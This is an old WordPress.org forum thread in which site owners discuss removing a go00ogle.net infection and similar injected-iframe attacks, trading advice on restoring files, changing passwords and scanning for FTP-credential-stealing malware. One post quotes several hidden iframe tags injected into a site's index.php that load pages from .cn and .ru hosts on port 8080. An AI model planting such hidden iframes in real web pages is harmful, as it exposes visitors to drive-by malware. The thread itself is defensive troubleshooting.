WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Removing a go00ogle.net infection (21 posts)

  1. ambanmba
    Member
    Posted 5 years ago #

    I just spent the afternoon fixing a friend's site. Turns out this little bugger is spreading around to others as well, but as yet I haven't seen anything on Google or even here about it.

    I put together a tutorial to remove go00ogle.net if you are hit by it.

    http://blog.ambor.com/2009/07/how-to-remove-go00oglenet-infection.html

    Sorry for the "blogspam" but this is so far the only tutorial that I know of to get rid of this.

    ambanmba

  2. Samuel B
    moderator
    Posted 5 years ago #

    great tutorial!
    this info should help others with other infections

  3. nazcar
    Member
    Posted 5 years ago #

    great one. i am encountering the same problem but different type (install iframe - .ru domain site with port 8080)
    with my WordPress blogs.
    they are modifying my wordpress index.php, default-filters.php and theme's/index.php, and a framer virus was detected by avg8,

    which resulted to a php error message.

    My Quick solution:
    re-upload:
    index.php, wp-includes/default-filters.php and your theme template/index.php

  4. Vertexmarketing
    Member
    Posted 5 years ago #

    Hi,
    after reading your post I am wondering if my index.php page has something like that too:
    <iframe src="http://globalmixgroup.cn:8080/ts/in.cgi?pepsi65" width=125 height=125 style="visibility:
    <iframe src="http://bigtopstudios.cn:8080/index.php" width=194 height=193 style="visibility:
    <iframe src="http://beachhousename.cn:8080/index.php" width=189 height=160 style="visibility
    <iframe src="http://namemartfilmlife.cn:8080/index.php" width=135 height=159 style="visibilit
    <iframe src="http://shopmovielife.cn:8080/index.php" width=113 height=136 style="visibili
    <iframe src="http://coolnamemart.cn:8080/index.php" width=113 height=118 style="visibil
    <iframe src="http://b6t.ru:8080/index.php" width=151 height=154 style="visibility: hidden"></iframe>

  5. ambanmba
    Member
    Posted 5 years ago #

    @vertexmarketing,

    It's definitely not right for you to have all those iframes in there.

    The way these scripts work; however, the problem is potentially not in the index.php file, but rather inserted by a script. I would go through the instructions on my site to use AdBlock Plus to see exactly what scripts are running on your site.

    Unfortunately the malicious scripts can easily be obfuscated so that doing a search (e.g. for "globalmixgroup.cn") won't reveal anything. Instead, what you should do is use AdBlock Plus to selectively disable the scripts until you find the one that is injecting the iframes.

    Once you've narrowed down the script, you can either remove the bad code (you kinda need to know what you're looking for) or just copy a "good" version of the offending script back to your site.

    ambanmba

  6. mfshearer72
    Member
    Posted 5 years ago #

    You rock for putting this together. I just followed your instructions and cleaned up a site that this happened to.

    Much appreciated!

  7. qbano
    Member
    Posted 5 years ago #

    Good Job! Thanks. This is why i love WordPress...

  8. azmitaufik
    Member
    Posted 5 years ago #

    I'm facing the same problem as nazcar. Even though I've upgraded my wordpress version to 2.8.2 and had replaced all the infected index.php file for more than 5 times in past 2 weeks but the problem keeps repeating.

    It had been more than 2 weeks, and yesterday my site was once again attacked. I haven't replace the infected php files yet. You can see that my site is currently getting the warning and parsing error from the injected php files.

    How did the injection took place in version 2.8.2? Any solution?

    My site is azmitaufik.com

    Thanks.

  9. ambanmba
    Member
    Posted 5 years ago #

    @azmitaufik

    I would try changing all your passwords (WordPress, Hosting admin panel, myPHP, FTP, etc.) People could be getting in behind WordPress if they know the password to the back-end of your site.

    ambanmba

  10. nazcar
    Member
    Posted 5 years ago #

    @azmitaufik
    your computer is infected with malwares..its a malware that steals ftp passwords and inject codes on your files. i suggest you try to scan your system with http://www.malwarebytes.org/

    then change your ftp password..

    system registry are also infected by malware, i suggest you also do a registry scan..

    For now, i am using my web host provider's online FTP

  11. t3ch33
    Member
    Posted 5 years ago #

    Hi. Can someone tell me what version this is affecting?

    Thanks.

  12. tlongren
    Member
    Posted 5 years ago #

    @t3ch33, it doesn't affect a specific version of WordPress. I've found that various plugins are vulnerable.

  13. nazcar
    Member
    Posted 5 years ago #

    @t3ch33 it affects all the files with index*, main* default* in your website.

  14. tommix
    Member
    Posted 5 years ago #

    how do they infect the blog? by ftp or holes in worpress php's?

    cause my passwords all are min of 12 chars with chars like '\*&*^% and so on..so how do they modify your files?? By cracking your passwords or what?

    and if not by ftp -so all yu have to do is chmod your php files to 444 and it will fix it :D and disable chmod function in php.ini so they can't execute it in php.

  15. Matt McInvale
    Member
    Posted 5 years ago #

    These attacks are carried out by someone with your FTP credentials. Change all your passwords & reinstall Windows. The infections are *very* difficult to remove and it's likely you'll be unable to remove everything they've installed on your system.

  16. martinsclass
    Member
    Posted 4 years ago #

    I don't know if this is it, but I've been toying with various plugins to try to get avatars working for my students who will be users soon, and after installing the plugin *user photo* I started having this error message pop up - first on my user profile screen after attempting to upload a pic, and then all over my site, on various pages. Not all of them, but on user profiles and on one not all of my pages.

    Now I have deleted that plugin, and the error remains on my "policies" page.

    I'm at a lost of what to do, that permission thing is so tacky!

  17. martinsclass
    Member
    Posted 4 years ago #

    i think I resolved the issue, it had to do with an image that wasn't uploading right

  18. UseShots
    Member
    Posted 4 years ago #

    @ambanmba: Thanks for the tutorial!

    @tommix: Malware simply steal your FTP credentials from your FTP program configuration files. Everything you save in your FTP programs is easily accessible for malware.

    For example, FileZilla stores your passwords in plain text and don't protect them "by design". Other FTP clients are no better. So don't save your passwords in FTP programs if you don't want to see your sites hacked.

  19. webmistressofthedark
    Member
    Posted 4 years ago #

    I have a different problem. In the past, older versions were hacked through the themes and you could simply remove the files and replace them, upgrade and change your password.

    I noticed on one blog which I have updated, using v2.5.1, that the person got into the database and (his handle was found in both users and usermeta files) and it made it so he replaced his name where my 'admin' name appeared. It was just this morning on the last two posts, which I lost when I deleted his user info from the DB.

    Finally I got rid of where it says Admins (2)... I knew he'd been into the DB because I deleted ALL the users except the admin, and it still said that before I went into the PHP My Admin.

    I do not know a heck of a lot how to fix the DBs except after I did that I repaired and then backed up and then upgraded.

    Here is my question... I have changed the password to the admin for the blog but now I am not sure how to change the DB password.

    Is this done in the config file or in the cpanl or php my admin somewhere?
    If so I can only find a way to delete the db NAME and start over with a new NAME for it but I fear if I do that I might lose content.

    TIA

  20. webmistressofthedark
    Member
    Posted 4 years ago #

    This is version specific and they get in via the theme files.

    Look in your header, footer and index files.

    Mine was hacked in the DB alone and I still can't figure out how to change the pw for the DB itself...

  21. digitalguru
    Member
    Posted 4 years ago #

    Changing the database password can be done through PHP MyAdmin.

    Here are directions to make the changes. http://www.devlounge.net/publishing/reset-a-wordpress-password-from-phpmyadmin

Topic Closed

This topic has been closed to new replies.

About this Topic